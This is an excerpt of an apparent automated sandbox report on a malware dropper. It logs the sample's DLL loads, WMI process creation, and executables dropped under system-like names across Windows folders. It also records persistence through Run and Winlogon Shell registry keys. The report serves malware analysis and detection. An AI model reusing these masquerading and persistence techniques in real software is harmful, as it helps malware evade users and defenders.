Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: version.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Desktop\spoolsv.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: apphelp.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: version.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: wldp.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: profapi.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: version.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: wldp.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: profapi.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows Mail\b7ad5a7a0bb6c8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Directory created: C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8	Jump to behavior

Source: 5U9CuGu1ru.exe

Static file information: File size 2612447 > 1048576

Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5U9CuGu1ru.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 5U9CuGu1ru.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 5U9CuGu1ru.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5U9CuGu1ru.exe
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp

Source: 5U9CuGu1ru.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5U9CuGu1ru.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5U9CuGu1ru.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5U9CuGu1ru.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5U9CuGu1ru.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

File created: C:\Users\user\AppData\Local\Temp\Intodhcp\__tmp_rar_sfx_access_check_4930406

Jump to behavior

Source: 5U9CuGu1ru.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081E28C push eax; ret	0_2_0081E2AA
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081ED46 push ecx; ret	0_2_0081ED59
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F3791D push dword ptr [ebp-17000000h]; retf	6_2_00007FF848F37923
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F32C58 pushad ; retf	6_2_00007FF848F32C81
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F32C68 pushad ; retf	6_2_00007FF848F32C81
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Code function: 6_2_00007FF848F32C78 pushad ; retf	6_2_00007FF848F32C81
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 18_2_00007FF848F32C55 pushad ; retf	18_2_00007FF848F32C81
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F2791D push dword ptr [ebp-17000000h]; retf	20_2_00007FF848F27923
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F22C58 pushad ; retf	20_2_00007FF848F22C81
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F22C68 pushad ; retf	20_2_00007FF848F22C81
Source: C:\Users\Public\Desktop\spoolsv.exe	Code function: 20_2_00007FF848F22C78 pushad ; retf	20_2_00007FF848F22C81
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F1791D push dword ptr [ebp-17000000h]; retf	22_2_00007FF848F17923
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F12C58 pushad ; retf	22_2_00007FF848F12C81
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F12C68 pushad ; retf	22_2_00007FF848F12C81
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 22_2_00007FF848F12C78 pushad ; retf	22_2_00007FF848F12C81
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Code function: 25_2_00007FF848F32C55 pushad ; retf	25_2_00007FF848F32C81

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

File created: C:\Users\Public\Desktop\spoolsv.exe

Jump to dropped file

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	File created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Recovery\ShellExperienceHost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Recovery\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Users\Default\Documents\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Users\Public\Desktop\spoolsv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcD

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

